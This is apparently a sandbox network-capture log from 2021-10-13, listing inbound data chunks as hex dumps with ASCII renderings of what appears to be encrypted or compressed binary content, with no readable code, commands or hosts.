                                                                            2021-10-13 17:30:43 UTC194INData Raw: 67 34 76 83 f1 9a b2 df 14 45 0d d1 77 18 4c 5e be a2 49 c5 3b cf 18 95 2a af 85 46 75 7a 0f d0 dc e2 bb cc 10 1f 5a b6 cd 26 74 33 72 79 21 ee 48 41 f6 96 e3 cc ba 81 54 24 5b 81 19 5e 1d 72 a4 f6 d4 85 81 4e d2 74 96 61 27 a7 ae 72 84 2e 03 47 09 16 3f a3 20 c3 5f 00 ce 49 f0 ac 63 92 0b 15 21 de a3 d9 3f c1 58 df f3 59 96 5d bd 55 d2 d4 b0 23 a9 0d 0b e9 1d 27 f9 9c e7 96 04 32 4d 9e 04 88 bf e0 0e c3 c6 9d 1a a7 09 0a 4b 75 65 44 ed 8c 2b 0b f5 a8 d2 1b 64 e2 d7 29 e8 f7 f5 6e 4b ab fb d7 d3 66 2e 5f 32 4f 4d c1 5f 0d a3 78 ed b9 6b 58 13 ed 9b 0e 5b 8c a8 27 4a fe 23 bb 35 14 6c 54 50 81 44 19 bc c5 5d 50 54 94 19 7c d0 a4 4a d0 ae 4f da 6c df 5e 16 97 e9 af 49 9f a8 27 a1 3e 10 f4 a8 09 ea 0e 32 c9 3d e1 47 f3 6e 23 17 42 51 5b 51 b8 a7 25 03 c0 0c
                                                                            Data Ascii: g4vEwL^I;*FuzZ&t3ry!HAT$[^rNta'r.G? _Ic!?XY]U#'2MKueD+d)nKf._2OM_xkX['J#5lTPD]PT|JOl^I'>2=Gn#BQ[Q%
                                                                            2021-10-13 17:30:43 UTC195INData Raw: ba da e3 5d 8f a6 74 87 9e 6d 92 2f 02 65 cf a0 65 09 86 5d b6 05 e2 40 e5 67 f2 ef a0 7d e7 89 4f e2 fb 9f 1b d4 b3 49 81 c8 85 6b 60 58 74 9b 86 1a e5 f1 af 14 95 75 3b 90 88 79 07 a9 f9 89 0e 82 dd 5d fe b3 f4 8b f1 cd 0f 96 2b d2 ef d9 d1 68 cc 6c e7 a3 6f a2 50 fe e6 f6 25 2f 6a af 13 4e 77 05 2b d5 12 b2 23 00 b9 4a d1 76 e3 d8 a3 d7 fa 65 1d 09 73 90 2e 2e 9c 90 55 3d 2a 60 b4 42 fd 2f 62 ae 89 1d cd 86 a3 dc 8b 5e 16 f8 2b 2b 41 68 d4 31 84 20 50 9b 72 7d 96 04 b1 58 a9 f7 89 cb 92 1e b6 d7 21 db c9 5f 4d f5 10 f4 96 66 88 2f a7 24 fb 14 6c f6 0b e4 b6 c9 e5 30 77 a4 5a b9 23 61 78 1c 58 f7 9e b7 ef 2b 96 f5 39 9e d5 0c ea 59 3e d0 6a 4c d2 ef ff 2f 64 1e f6 1b 80 be 83 c7 e9 fa 11 41 9b f1 98 f0 ca fa 5b b7 0e 5f 11 30 e0 8b 4b cf 9f 45 4a 85 2a
                                                                            Data Ascii: ]tm/ee]@g}OIk`Xtu;y]+hloP%/jNw+#Jves..U=*`B/b^++Ah1 Pr}X!_Mf/$l0wZ#axX+9Y>jL/dA[_0KEJ*
                                                                            2021-10-13 17:30:43 UTC196INData Raw: fa 74 03 51 7a 4b 85 2e a5 9f cc 55 4a a2 ff eb 26 14 66 8b 1a 07 ee 29 14 0c f3 c3 cc de d4 af 43 7b 81 7c 0b e1 31 85 f6 96 d3 7c 0b f3 74 d1 37 d9 e0 81 72 c2 78 fc 0e 26 16 5a c6 77 9e 6d 56 cf 3a b1 da 47 db 5f 15 65 8a de bb 68 c1 1d 8b 8e 3d c2 5d ff 01 ad b2 e7 23 e6 59 74 81 5e 7e 9c c6 14 d5 55 44 16 fe d7 f0 e0 ae 22 b7 eb f6 57 a7 c5 5f 00 32 03 44 97 d8 9e 4a 93 a8 d4 4f d3 a1 b1 29 e2 a3 4c 0b 2d ab dd 83 68 01 4d 5f 22 1b 71 a7 31 0d bd 2c 42 de 71 58 10 81 46 59 02 c1 85 48 5d b8 24 ce 34 48 59 1a 0a da 4c 19 c8 84 37 14 7d 94 24 24 af e2 4c d1 03 16 2b 25 f5 58 ff c9 a3 ca 4b 98 aa 78 ce 5d f6 f3 1c 56 c0 60 5b c3 1f b2 54 a1 10 33 2d 09 1f 0c 96 ac 4a 68 b5 92 91 58 75 b5 69 13 19 3a c6 f9 61 9f de 28 2f 6b 17 3a f5 7e 3f fa 6a 19 87 39
                                                                            Data Ascii: tQzK.UJ&f)C{|1|t7rx&ZwmV:G_eh=]#Yt^~UD"W_2DJO)L-hM_"q1,BqXFYH]$4HYL7}$$L+%XKx]V`[T3-JhXui:a(/k:~?j9
                                                                            2021-10-13 17:30:43 UTC198INData Raw: 18 9d e0 a0 0f ca 9e 5a a1 bd f0 05 c9 a2 5e 8f d6 a7 62 70 13 23 b1 87 44 a7 83 bf 14 83 6e 67 cc c5 44 06 ad 9d 9f 2e 9c c1 0b be fe cf 80 c1 84 39 8f 74 ae 80 ef d1 09 cf 40 fd 88 09 fe 39 c9 e6 db 2e 5b 3e f8 67 5a 50 15 1a f1 10 a3 2f 31 b6 76 cd 7f b2 b7 83 db 99 58 07 32 78 89 28 02 92 cb 36 0b 2e 36 b4 40 f3 0f 47 b4 bb 59 9c e3 f1 de 8f 4e 00 e3 2c 78 26 0d f0 3f bf 2f 50 c8 00 12 b7 24 e1 2a af e0 8d ca c7 24 bd d7 4f 98 ba 6e 71 c5 29 fb 90 36 ca 4a b3 2e f6 14 40 ea 2b a7 e5 ac b1 39 5b ca 68 fa 7a 0c 79 3c 78 d3 a8 ff fd 7c cd a7 74 9c c3 0b d4 6b 0f 96 1f 2d 87 ce dd 2e 62 01 f2 42 e5 fc 83 a3 ce e9 70 6b bd 94 dd f2 b8 d9 7e d2 27 6a 78 19 cd c8 4b ed f7 42 0b c0 27 a8 24 a1 3b f9 6f c8 c3 7e 9c 4b f2 59 1c d4 49 fa d7 85 3f 1d 2e b7 3a ee
                                                                            Data Ascii: Z^bp#DngD.9t@9.[>gZP/1vX2x(6.6@GYN,x&?/P$*$Onq)6J.@+9[hzy<x|tk-.bBpk~'jxKB'$;o~KYI?.:
                                                                            2021-10-13 17:30:43 UTC199INData Raw: 7c f2 96 ab de f5 f0 44 58 e0 6f 3f 93 27 aa 86 b0 85 0f 2a d1 2b f5 17 b8 d2 b6 00 d1 57 8c 23 70 51 58 d7 57 b8 54 65 cf 1a bb cd 73 f7 7d 41 7d ac bb d9 4d a4 0a 82 cd 36 fa 29 ff 39 d9 80 c8 53 e4 0f 32 80 73 42 83 f6 07 e4 60 32 24 f3 e8 f8 c4 92 33 c1 dd ed 73 f3 e8 5b 74 03 21 27 a7 fa ec 6a c4 cf f7 6c 8c af 88 5f cb 86 25 0b 14 df fc a1 04 16 6f 2d 23 4c 16 a7 12 52 98 0e 30 cb 43 36 27 aa 41 62 76 f9 98 5b 38 bd 2c d2 25 78 53 28 0a d9 64 69 e7 b5 54 31 51 fd 0e 12 ed c5 67 b4 44 00 4a 00 c8 17 fc fb c6 cb 67 db a6 4c a2 5c cd 87 10 61 ae 44 62 b0 1d ea 1c 97 3d 43 39 35 7d 1a aa df 7f 5e db a7 ad 58 75 89 1d 09 25 49 d7 cf 0f 8e e2 28 0f 5e 78 2d c9 7e 1e ca 19 0f b1 4a 10 ef 37 2d b2 ad 8f 21 85 6a 77 24 e8 4e b9 e0 45 dd 20 2e ac a8 50 6b 08
                                                                            Data Ascii: |DXo?'*+W#pQXWTes}A}M6)9S2sB`2$3s[t!'jl_%o-#LR0C6'Abv[8,%xS(diT1QgDJgL\aDb=C95}^Xu%I(^x-~J7-!jw$NE .Pk
                                                                            2021-10-13 17:30:43 UTC200INData Raw: a4 85 bf 0a de 53 60 d0 ed 4a 06 a1 f3 bb 47 9f cc 1a 93 e3 c1 80 c0 ed 0f 85 18 ae 8a fc f8 68 dc 40 cb be 32 f4 39 c4 ee bf 1e 0f 1f a5 56 6b 71 13 19 dd 10 a0 46 17 bd 57 e6 78 b2 b7 83 d7 f7 76 74 35 64 82 28 32 91 8c 11 16 2b 24 dd 78 f5 54 62 ad 9c 4c 90 e8 96 b9 ac 48 30 fb 1d 7c 06 0d b6 6a 9e 3a 56 c4 28 1a db 14 eb 1a 9a e1 8d 99 f3 04 ac d1 79 83 ae 0b 67 d3 3a fb 92 32 fa 4e 81 20 c9 04 57 f1 11 b2 80 9c df 3a 4d a9 4f f8 70 25 51 25 78 e7 b9 8d c7 77 c4 c3 7d 96 c7 16 d9 63 0b f2 01 38 9c cb fe 2c 11 35 f6 51 d0 8e ab b1 cb cf 74 55 a8 9e bb d8 a6 d9 49 c3 3b 77 7f 1f a1 c8 45 e3 ef 46 79 e0 1a b8 1f a6 23 f1 04 f9 ac 6f 8d 5e f2 59 32 ba 78 f0 c8 b3 4b 28 22 ad 18 80 d6 e2 28 17 99 eb 5b 3a 0a 57 14 5b 4a f4 b6 07 6d e9 bd 50 c4 11 ed 2d 5f
                                                                            Data Ascii: S`JGh@29VkqFWxvt5d(2+$xTbLH0|j:V(yg:2N W:MOp%Q%xw}c8,5QtUI;wEFy#o^Y2xK("([:W[JmP-_
                                                                            2021-10-13 17:30:43 UTC201INData Raw: c3 84 01 e9 2e be 2b 70 55 50 a3 47 ac 24 45 a2 49 92 c3 18 d5 64 15 4c b1 de 9f 57 ad 1b 8e fa 2b f1 3c f7 57 ca b1 c5 7c c3 6e 07 8c 4c 53 a2 fb 07 fb 05 75 02 e8 d7 ed d6 90 39 af fe fc 52 d3 f5 6d 61 1c 54 00 b6 e9 f2 6e b0 cd c1 6c a1 83 87 44 aa 93 29 1e 25 ee d1 b0 27 04 49 2b 34 29 10 af 66 4e a9 02 32 cd 49 0b 27 9b 51 6f 6f 8c ad 5b 4c ac 28 d3 24 68 52 39 59 ec 66 7c ea b1 37 1d 40 f9 0e 0e d6 f7 60 a3 21 2f 46 6d ca 3d ea ce ef f8 72 ea a8 4d ce 5e cb 87 26 59 90 67 71 a2 15 ea 33 86 3d 6c 3e 31 6d 29 a2 ac 6d 5c b5 b7 a5 58 56 81 69 3c 25 4e f8 e9 15 98 ea 28 3f 57 63 01 e5 0a 3f ce 6a 29 bf 4c 19 9b 24 3a bf b4 9a 36 9b 0f 10 13 f9 67 9a fb 5a dd 73 14 ad b9 54 72 6d f5 8d 19 a9 aa 6a 33 a6 7e 88 bf 2f 79 76 9b f7 ec 31 a4 b4 f1 24 1a 1f f3
                                                                            Data Ascii: .+pUPG$EIdLW+<W|nLSu9RmaTnlD)%'I+4)fN2I'Qoo[L($hR9Yf|7@`!/Fm=rM^&Ygq3=l>1m)m\XVi<%N(?Wc?j)L$:6gZsTrmj3~/yv1$
                                                                            2021-10-13 17:30:43 UTC203INData Raw: 9a 7b 85 9f ff dd 66 c6 25 c0 b9 2a f1 3c c3 ed f0 3b 3e 2b fc 67 6c 7d 12 38 cc 1d a2 36 24 b1 4c cd 16 82 b7 84 d5 fc 65 31 1e 7e 94 2c 23 95 cd 3b 64 0b 21 d3 63 ff 1f 45 b4 b8 53 9a e3 81 cd 83 55 31 96 38 78 01 37 c4 3b be 2d 56 c4 36 09 b2 2f ea 58 88 f7 9c f0 83 32 ab c0 62 84 b9 7f 4b cf 37 9a 85 32 ca 70 a6 35 fb 04 50 eb 3b b0 f3 aa c3 36 4e be 47 e7 7b 61 63 28 6a c0 a8 92 80 4b d6 ad 4d 90 dd 1d 9b 4f 05 f8 21 38 9c c3 f9 25 74 16 d6 5d e5 9f b7 b3 c3 d4 7f 05 9f 9f ab d8 b8 d3 74 b7 1a 6a 63 11 cf ec 69 e1 f2 57 6a f7 20 bf 02 a1 4d c4 71 c3 c3 5b 9c 58 c4 74 21 c8 53 de d9 99 7b 35 3c ad 7f e7 e0 e3 15 37 85 f0 54 20 26 32 3e 66 56 f7 bd 6a 24 c8 bb 6e f2 14 f7 01 3a ba dd a5 d1 60 46 91 8f 72 bc 5e 20 bc a7 7c ab 89 b6 ad 3b 85 b7 e8 d5 d1
                                                                            Data Ascii: {f%*<;>+gl}86$Le1~,#;d!cESU18x7;-V6/X2bK72p5P;6NG{ac(jKMO!8%t]tjciWj Mq[Xt!S{5<7T &2>fVj$n:`Fr^ |;
                                                                            2021-10-13 17:30:43 UTC204INData Raw: ac 89 5f b3 1f b0 eb 2d f1 2f 9a 12 c3 a0 d4 51 81 4d 1d 9d 5c 48 be e8 03 e4 71 57 15 9c c7 e1 cb 81 24 b8 cb f6 73 ca e6 7c 74 14 26 44 b4 ea ea 50 87 c7 ff 68 a6 92 83 5b aa a7 29 18 0c ce cd 97 07 0f 6a 2a 32 29 03 c2 01 68 af 24 06 d7 55 0a 36 9a 5b 62 74 e9 98 3e 4b 9b 39 fd 15 63 52 1f 6f eb 7b 75 fd b9 45 50 76 f1 15 3f c3 cd 64 b3 2b 2f 59 09 fb 31 fb e6 c6 da 13 cc a6 6c a1 4e cb 81 79 68 b2 06 64 b1 78 a9 3c 91 49 77 07 22 1f 0e a3 c3 60 43 b5 97 ba 3d 53 98 0c 0b 32 55 cd c5 02 89 c2 5a 3e 5d 65 5e ef 12 3f c2 18 2f ac 56 1f 8a 00 2b 8e 8f 9c 3c 84 0f 24 13 f9 68 ae fd 5c dd 43 19 9b bf 43 70 1f ba ae 13 b8 a0 7b 2e 8d 6b a9 a9 2e 0d 74 93 83 d5 12 d1 be fe 41 3b 22 fb 78 d4 21 21 4a 10 e8 d3 10 5d c6 f8 59 2d d1 30 cf ed 46 23 dd f9 21 6d a9
                                                                            Data Ascii: _-/QM\HqW$s|t&DPh[)j*2)h$U6[bt>K9cRo{uEPv?d+/Y1lNyhdx<Iw"`C=S2UZ>]e^?/V+<$h\CCp{.k.tA;"x!!J]Y-0F#!m
                                                                            2021-10-13 17:30:43 UTC205INData Raw: 09 9a 2c a2 21 25 b4 42 d1 53 a9 a8 95 db ea 62 1d 09 73 82 5c 30 99 d6 0a 2d 24 30 d8 63 f6 1f 62 ae ba 47 96 e4 90 d5 a5 4a 3a e4 3e 69 1c 07 ee 2d cd 3d 41 d9 19 34 b5 23 e8 2d 9f f7 a1 c1 80 3b b7 c1 71 81 86 7b 47 d2 38 ee 8b 38 d0 5c f5 12 e3 03 51 fd 12 fb c3 a6 dd 33 5b a9 5a e1 7a 0f 43 51 6a d1 b9 a0 e3 78 db aa 54 8c dd 39 c0 78 05 fb 33 38 87 c1 c2 2e 75 1b e1 40 e3 88 ab a8 c4 c8 11 56 ae 83 b4 df ad ef 6a db 20 6a 5e 08 d5 e2 45 e0 ec 27 59 e0 2e a9 15 80 3d e2 6d c2 ad 4f f9 4b fe 43 0a fd 4d fa c9 90 4c 5a 2c a6 0b df c6 ff 2b 16 9e 99 75 31 19 14 2f 43 4b f3 d3 2d 26 d9 86 5c d2 1f e6 0f 31 a0 f6 ae c3 7c 35 c2 b3 68 a4 4f 31 82 e1 5d b6 80 bc a8 26 85 a7 f2 bb e6 d4 1f 94 00 02 b6 52 01 9f 88 af 9b 49 60 96 51 26 bf f1 7e 8e d0 b6 48 cc
                                                                            Data Ascii: ,!%BSbs\0-$0cbGJ:>i-=A4#-;q{G88\Q3[ZzCQjxT9x38.u@Vj j^E'Y.=mOKCMLZ,+u1/CK-&\1|5hO1]&RI`Q&~H
                                                                            2021-10-13 17:30:43 UTC207INData Raw: f3 76 47 0b e8 85 fb c0 94 09 94 fe fc 73 e6 e0 6d 6e 05 54 13 b6 ed dd 63 ad cd fc 6c d3 b5 8b 5d da b7 20 03 1f c5 cb d4 3b 1b 69 2b 23 21 5f 8f 07 63 ba 1c 27 d4 43 36 27 e9 6c 63 6e c9 86 5b 55 9b 23 d6 51 4c 55 39 6b fb 7c 74 ee b2 43 50 60 fa 17 15 dd cb 7a bc 21 20 5f 6d f5 35 f2 d5 cc cb 66 f5 ac 4e ba 39 c9 96 0d 51 90 67 71 a6 16 9e 54 a4 2c 47 3e 31 6d 2d a1 d8 0f 56 d0 a0 97 1b 47 9e 1b 3e 2e 4e a7 e9 31 b8 e9 4c 1c 5d 7e 30 d8 7e 3d c6 1e 20 92 56 16 8e 0f 1a a5 99 be 3c 9f 61 03 76 ea 5d a8 cd 75 d7 55 03 aa cd 56 7a 19 e5 a9 15 b8 a0 5d 35 bd 77 af c6 1b 68 67 b5 9f eb 2e e7 bc e9 4a 3d 66 db 75 d9 0d 23 45 26 fd d7 71 6d c2 eb 5f 31 90 1a e9 e6 43 3a b8 c9 03 6b bf d3 6e 55 54 f9 b5 ad d1 99 62 23 4a f5 ba 00 a4 33 f1 63 0a 29 4f a7 28 32
                                                                            Data Ascii: vGsmnTcl] ;i+#!_c'C6'lcn[U#QLU9k|tCP`z! _m5fN9QgqT,G>1m-VG>.N1L]~0~= V<av]uUVz]5whg.J=fu#E&qm_1C:knUTb#J3c)O(2
                                                                            2021-10-13 17:30:43 UTC208INData Raw: 1d 64 10 c6 6f e2 0e 44 a7 8f 4a 89 ee 88 b9 8d 5f 2b c9 1e 6e 06 0d ed 3c a1 37 24 ea 23 09 9e 38 e1 3b 8e e6 81 c1 a0 16 ab d0 75 80 ab 67 5b a0 3e ff 96 08 ff 4b 91 33 ff 03 56 de 1e b8 e9 a5 c8 5f 73 bf 42 fc 7c 11 5c 28 19 f5 a3 86 ae 5b cf ac 5a 92 f3 17 c5 75 6a c5 2b 3f 9a c7 fd 65 43 07 fd 51 e9 91 a7 e9 f9 de 63 6c bb 9d b4 cb ab c8 73 d8 27 30 57 17 d3 e6 4b fa eb 42 79 f6 67 8e 04 a1 2c e4 7d ad a4 59 8d 73 cf 58 21 db 53 c5 d4 99 4c 33 28 a2 13 cd e0 fa 25 16 94 99 71 26 08 36 33 47 7d e9 a1 0f 20 d9 a0 43 ca 78 e4 2f 2b 9c cb af c1 67 35 b6 92 68 d7 5c 31 9b 90 4a be 9d b8 b9 3c f1 8c 87 84 e7 dc 1e 98 3c 1e da 4d 14 b2 be de 89 4d 78 a0 44 3b c9 ff 60 b2 fc bc 7d dc 78 3e aa 99 cf 49 08 85 a0 33 4e fb 86 96 1a 22 2a 7a 4a 71 cb dd 6f 3c 29
                                                                            Data Ascii: doDJ_+n<7$#8;ug[>K3V_sB|\([Zuj+?eCQcls'0WKByg,}YsX!SL3(%q&63G} Cx/+g5h\1J<<MMxD;`}x>I3N"*zJqo<)
                                                                            2021-10-13 17:30:43 UTC209INData Raw: cc a6 9c 1a d7 e6 e7 2b a4 f2 4c 6b 68 2b 2e da 6d 62 1a 42 54 29 74 e2 66 1f 5b e6 47 b9 27 59 41 80 30 0e 03 8d e4 38 38 fd 4c ac 5f 0f 26 4d 08 99 1a 08 0b 79 34 56 37 f9 67 5c ad b6 79 df 46 4b 0b 6f ac 56 82 95 a3 a9 1b 96 cf 27 cd 25 a3 e2 5d 0a c0 07 0d ca 7d ea 54 f1 c9 f2 6b 70 1f 5a 4f 69 0b 31 b4 d9 c6 5b 32 ec 75 4b 47 3c a9 b2 e1 30 95 a8 9d 20 97 8b be fe 83 ad 6c 7f df 2b f5 32 6d 5a cb fd fc d3 13 09 57 77 8c 2a 5c 77 32 98 21 6c d6 c8 11 1f 7f 3a 2c 79 fb cb 0c da 1d 1f fb c7 5d 1f 93 23 e4 8d 54 b6 53 51 36 c9 b7 8c 9b 68 51 45 34 c3 7c ab 6d 27 a4 ac 36 55 db 59 89 82 3d 5f 38 7e 51 99 3f a7 1a 10 39 86 c0 f4 a2 e5 7f 64 01 8f c4 50 d3 77 82 05 70 58 3a d3 2a 67 c4 0a 1a ac af df a4 8a 60 44 88 50 8c 94 49 f8 9f f0 b4 bc f6 4f 06 36 59
                                                                            Data Ascii: +Lkh+.mbBT)tf[G'YA088L_&My4V7g\yFKoV'%]}TkpZOi1[2uKG<0 l+2mZWw*\w2!l:,y]#TSQ6hQE4|m'6UY=_8~Q?9dPwpX:*g`DPIO6Y
                                                                            2021-10-13 17:30:43 UTC210INData Raw: bd 1d 5b 19 66 13 cc 33 e1 d7 d0 02 1f a5 ab a2 34 40 3d 96 64 4f e0 57 53 39 8a 94 c8 bb 80 a5 39 3f 81 13 42 fd 61 e6 f8 c8 99 61 41 b8 66 a1 7c db a4 c7 72 8d 2f e0 54 45 18 20 bf 1e cf 39 12 fa 4b d6 a4 1f 91 1b 94 85 ce 5e 0c 2c a8 78 dd 8c 58 89 58 94 4e aa d8 ad 3f 94 1d f5 64 1e 39 d0 82 7a 8a 18 2e 7a 80 98 94 b8 e2 48 c1 85 91 01 a4 9b 14 1d 6d 49 4a d5 8f 9d 13 d8 b4 90 1c d3 e7 e4 35 ac e4 4d 6b 64 ab a3 d3 7d 70 9b d2 47 52 71 c4 46 0f da 73 51 b9 20 58 50 eb 28 12 00 8b ff 2c b9 6f 4c bc 51 08 01 4c 19 98 1c 08 9b dd 36 45 37 15 ec 7d b1 a4 01 c3 c5 c3 2a 73 ad d8 3e 96 e0 a6 06 8a 48 b9 cf 2c bc 72 3d 0d ce 08 01 cd 76 f6 41 f1 c8 aa 6f 5e 11 5a 4e 31 1a 23 34 4d c9 4a b3 ac 67 4e 52 bb e3 a3 6f f3 85 3a 25 20 7e 4c c5 6c 33 b1 03 6d b7 2b
                                                                            Data Ascii: [f34@=dOWS99?BaaAf|r/TE 9K^,xXXN?d9z.zHmIJ5Mkd}pGRqFsQ XP(,oLQL6E7}*s>H,r=vAo^ZN1#4MJgNRo:% ~Ll3m+
                                                                            2021-10-13 17:30:43 UTC211INData Raw: 55 f2 8d c2 0a 94 e9 3e d4 c1 97 5e b8 d0 39 eb b5 e2 08 14 77 3e f7 e6 2e d0 f2 cb e7 6c 05 00 bf 8f 25 7f cd 80 d9 5a e9 b4 6b c2 af bc f9 a1 96 e3 f7 0a 62 fe 96 b7 14 b4 38 95 ca 5e 92 56 a9 8c 9f 4a 55 44 9e 11 18 17 7a 7d b6 62 db 54 65 de 23 a1 0b d4 d6 e9 b9 9e 12 69 63 00 f4 54 5f fc a0 48 61 57 56 a9 13 ca 7d 01 d5 ef a9 f0 84 ff b7 ff 28 dd 9f 5d 13 7b 60 88 43 c8 53 21 a3 5b 78 d3 48 99 5d e7 8e fa 2d e6 5f c5 a6 0d e8 d4 0e 2a a8 44 9f f0 d5 ab 32 f0 4f 87 75 37 1a 72 c7 02 c4 ac 5a 23 cf 33 8d 08 64 3e 5f 04 b1 df 7d b3 04 a6 de 3c e4 b5 6a 37 19 77 93 5c 5e 87 a5 b0 49 10 61 93 36 81 f1 c2 c5 bf a9 93 0c d8 ff d3 ac cf a1 1f be 4e 1b 0c 7d ab 96 2f 86 97 21 0b 87 43 d1 68 c7 41 96 01 ac d1 be fc 26 89 b5 50 b0 35 93 bc e1 22 5f 56 c6 63 87
                                                                            Data Ascii: U>^9w>.l%Zkb8^VJUDz}bTe#icT_HaWV}(]{`CS![xH]-_*D2Ou7rZ#3d>_}<j7w\^Ia6N}/!ChA&P5"_Vc
                                                                            2021-10-13 17:30:43 UTC212INData Raw: 8e 3a 94 c2 b5 8a 8f 25 3b 90 99 ef e3 60 d3 e5 d4 82 69 5e 27 c5 96 6f d7 ae d0 70 97 af c9 54 f0 f2 27 a4 09 cf 31 12 4d 40 d6 a0 16 9c 07 08 0a d2 d0 cc 2f 43 cf df 80 57 9c 40 94 5e aa d1 bf 2d 8f 1d 1d f4 11 21 d0 9d 67 98 0b 3c 75 9b 80 9d b7 61 cf c0 83 84 0f b5 05 bd 12 18 46 c5 72 89 be 0e d6 2a 2b 16 d6 c6 e6 3b 28 49 4a 4a 7b b9 3d 15 60 67 1a 5e 5b 42 7f cd 61 0b ce 69 c3 20 27 56 4e e7 3a 06 1f 82 e2 13 3f ee 58 b0 d0 94 20 5f 8b d8 01 0b 0a 45 36 5e 30 86 e0 e5 ae b6 95 91 4a 40 25 7f 2d f8 90 83 ca a0 0e 9d db a1 8e 2b c7 fb 64 00 c8 0c 03 c0 69 68 9d ff 58 b1 a3 4c 1a 68 cf be 8f a0 b8 d4 cb 4d 20 6d f0 5a 52 bb e7 ae 6f f3 8b 44 4c 5d 17 39 ac 17 5a cd 6a 0c de 2b 72 e7 6d 42 ce e0 eb 4f e4 8d c2 6b 88 2a b5 80 b7 19 27 4d dc cc 3f 0e ef
                                                                            Data Ascii: :%;`i^'opT'1M@/CW@^-!g<uaFr*+;(IJJ{=`g^[Bai 'VN:?X _E6^0J@%-+dihXLhM mZRoDL]9Zj+rmBOk*'M?
                                                                            2021-10-13 17:30:43 UTC214INData Raw: d5 e3 58 52 ed 02 15 a7 84 2c 64 d5 98 c0 5a f0 b4 72 d1 b1 a8 e2 84 86 60 ec 05 e5 e1 8b b2 08 b4 37 bc d9 41 8c 4d a4 94 ad 7e 52 59 99 0e 00 1c 61 78 bc 76 f3 41 48 cd 31 22 8f d0 ca 66 fe 8c 03 f5 ff 1c e3 dd 17 f2 be 5b 6a 42 4e b1 18 80 fb 2b dc f5 36 f7 9a ed a5 f8 bb 1f 84 36 15 68 6b 9d 42 d0 52 39 b1 5b 7f dc 40 86 4a 79 2b e6 a1 ef 50 c9 b6 02 6c 50 0a 30 21 19 8f f0 d6 27 2e e7 c0 da 78 39 96 63 db 8e db 33 5a 30 d8 af c8 1d 69 22 38 0b 35 6c f7 a6 12 a3 c5 37 f7 be 76 bd 04 7b 14 1f 44 ee a1 98 45 1f 63 11 68 86 fc c1 c9 a4 b3 19 01 da f0 de b9 ce bc 1b b9 4a 16 11 7c a0 9b 24 86 97 29 03 82 4f c4 63 c1 45 9e 0c ba c4 37 ec 3e 1a ae 54 b4 22 9b a1 ee 31 54 56 cd 77 9d 8b 9f 57 6a e5 9d 32 54 70 59 60 25 32 95 c1 eb da ac dd b0 f3 6d 91 cb c6
                                                                            Data Ascii: XR,dZr`7AM~RYaxvAH1"f[jBN+66hkBR9[@Jy+PlP0!'.x9c3Z0i"85l7v{DEchJ|$)OcE7>T"1TVwWj2TpY`%2m
                                                                            2021-10-13 17:30:43 UTC215INData Raw: 8f d0 60 90 3c 7d df 71 04 bc e3 0d cf 31 12 4e d0 d5 bc 99 d2 07 1b 0a c1 d0 d1 23 c4 76 c0 8b 44 91 55 88 d6 ed c6 d8 2b 89 05 73 e1 11 29 de 90 6e 98 0d 3a 7c 9b 89 94 b7 62 63 cf 90 9c 1c a2 9a 0d 12 f3 d1 59 d6 92 9b 1d 46 b5 8f 1d c1 8f e1 29 a8 e8 51 6f 67 ae ae d3 60 6c 12 42 45 5e f3 43 68 10 de 69 c1 80 34 31 56 c9 34 1c 81 b5 e0 1e 3d f6 50 a7 59 05 3c 4e 02 9d 34 18 8a c1 34 54 22 96 7d 74 ab a4 15 cd 4a 61 2c 67 b8 4a 1f 08 a2 ba 92 d8 db 44 c0 2c bc 72 e0 0f d2 87 43 cd 76 f8 d5 a3 47 26 7f d2 ae 4a c1 b9 1d b3 bc d6 c6 56 27 fd eb ea 42 34 a9 a9 66 f8 89 3a cd af 1f 56 a4 78 7a a2 78 fe 43 3a 7f e8 65 57 d6 f8 f3 56 f8 07 7f 70 8d 3a da 8f 33 b0 69 6a c9 d8 23 9e f4 bb ef fd 9b de 0c db 51 18 c9 47 1c 18 01 77 6e 8b 49 b6 52 d8 27 47 68 90
                                                                            Data Ascii: `<}q1N#vDU+s)n:|bcYF)Qog`lBE^Chi41V4=PY<N44T"}tJa,gJD,rCvG&JV'B4f:VxzxC:eWVp:3ij#QGwnIR'Gh
                                                                            2021-10-13 17:30:43 UTC216INData Raw: e2 1c e0 ef 8f b4 19 a8 25 8d d8 5c 90 50 ae 79 bf 4b 5b 5d 9d 1c 05 12 78 7d 44 7e c7 44 56 df 21 a5 1d d4 de fa af 19 bd 71 60 00 e0 dc ff fa a5 51 6c 42 5b bc 12 b2 7b 23 c8 f0 2c f3 84 fb b1 e2 26 42 93 57 15 7d 60 85 7e cf 44 2c a5 42 5d da 42 8e 5f fc 97 e3 a4 cf 5f d0 a6 30 ef c2 03 2a b5 5e 8a e9 50 b6 32 ff 49 90 6c 2f 84 77 d2 91 4a 30 57 36 c2 26 8c 35 60 31 5a 1d b2 dc 7c 2f 12 a3 c1 28 7a 31 69 36 8d 7b 15 d3 4a ee a3 9b 5a 92 f3 95 25 81 f4 d3 44 2b b2 11 07 d2 e0 5e 30 db 3f 9b b1 49 1f 16 69 22 0a 21 8e 9d 35 89 80 5b 4e 68 dd cf 93 00 b0 d2 bc 55 28 9b 36 5e a6 26 92 a8 e2 34 46 43 cb 62 91 05 33 42 78 e7 85 38 5e 71 5f 40 25 31 88 db 62 47 b0 de b1 1b 7c 9e 5b df 67 9d ca a7 00 4d c6 c0 10 d5 30 40 e8 c2 14 c3 e5 db d2 5d 99 fd 9a d6 9a
                                                                            Data Ascii: %\PyK[]x}D~DV!q`QlB[{#,&BW}`~D,B]B__0*^P2Il/wJ0W6&5`1Z|/(z1i6{JZ%D+^0?Ii"!5[NhU(6^&4FCb3Bx8^q_@%1bG|[gM0@]
                                                                            2021-10-13 17:30:43 UTC217INData Raw: 3a cb be 14 6f 5d 77 5b 9c 5a 98 45 2d 38 a3 a3 70 04 54 ed 0d a7 3c 8f e6 7e 0b 3c 69 9a 82 8a b7 60 ba c9 9d b9 04 b5 07 e4 11 f1 bc 4a c1 0f 4b 1e 45 91 9c 10 d4 e4 f4 a9 46 e6 cc 86 68 ac b3 c9 66 6c 12 51 5b 42 7f cc 65 05 c6 75 4a a4 28 51 73 ed 35 1f 82 64 e4 30 36 f6 4a a4 58 04 29 47 02 90 3c 1e 99 d4 22 42 a4 0d 60 6e 2f 48 01 c3 c5 d7 2a 7f 2d b4 99 9b aa ba 92 ed cb 27 c9 33 a7 fa 7e 07 d1 87 3a ca 6a 6a b8 e5 49 31 69 4d 1a 40 c5 8c 0f 24 a7 55 51 59 20 6c 85 57 47 3d a5 ae 63 e1 9a 34 51 2e 0a 5c ab 7e 58 a2 64 6e 5f 00 72 cf 61 5d d9 7d 02 5d ff 2f 